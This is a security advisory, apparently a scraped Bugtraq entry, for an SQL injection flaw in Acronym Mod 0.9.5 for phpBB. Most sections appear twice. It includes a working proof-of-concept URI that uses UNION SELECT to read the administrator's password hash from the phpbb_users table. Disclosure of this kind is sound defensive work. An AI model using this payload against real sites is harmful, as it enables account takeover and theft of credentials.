Acronym Mod Admin_Acronyms.PHP SQL Injection Vulnerability
BID:21805
Info
Acronym Mod Admin_Acronyms.PHP SQL Injection Vulnerability
| Bugtraq ID: | 21805 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 28 2006 12:00AM |
| Updated: | Jan 04 2007 06:27PM |
| Credit: | the master is credited with the discovery of this vulnerability. |
| Vulnerable: |
CodeMonkeyX Acronym Mod 0.9.5 |
| Not Vulnerable: | |
Discussion
Acronym Mod Admin_Acronyms.PHP SQL Injection Vulnerability
Acronym Mod is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
Acronym Mod 0.9.5 is vulnerable; other versions may also be affected.
Acronym Mod is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
Acronym Mod 0.9.5 is vulnerable; other versions may also be affected.
Exploit / POC
Acronym Mod Admin_Acronyms.PHP SQL Injection Vulnerability
An attacker can exploit this issue via a web client.
The following proof-of-concept URI is available:
http://www.example.com/[Path]/admin/admin_acronyms.php?mode=edit&id=-1%20UNION%20SELECT%20null,user_password,null%20FROM%20phpbb_users%20where%20user_id=2&sid=AdminHash
An attacker can exploit this issue via a web client.
The following proof-of-concept URI is available:
http://www.example.com/[Path]/admin/admin_acronyms.php?mode=edit&id=-1%20UNION%20SELECT%20null,user_password,null%20FROM%20phpbb_users%20where%20user_id=2&sid=AdminHash
Solution / Fix
Acronym Mod Admin_Acronyms.PHP SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
References
Acronym Mod Admin_Acronyms.PHP SQL Injection Vulnerability
References:
References:
- Vendor Homepage (CondeMonkeyX)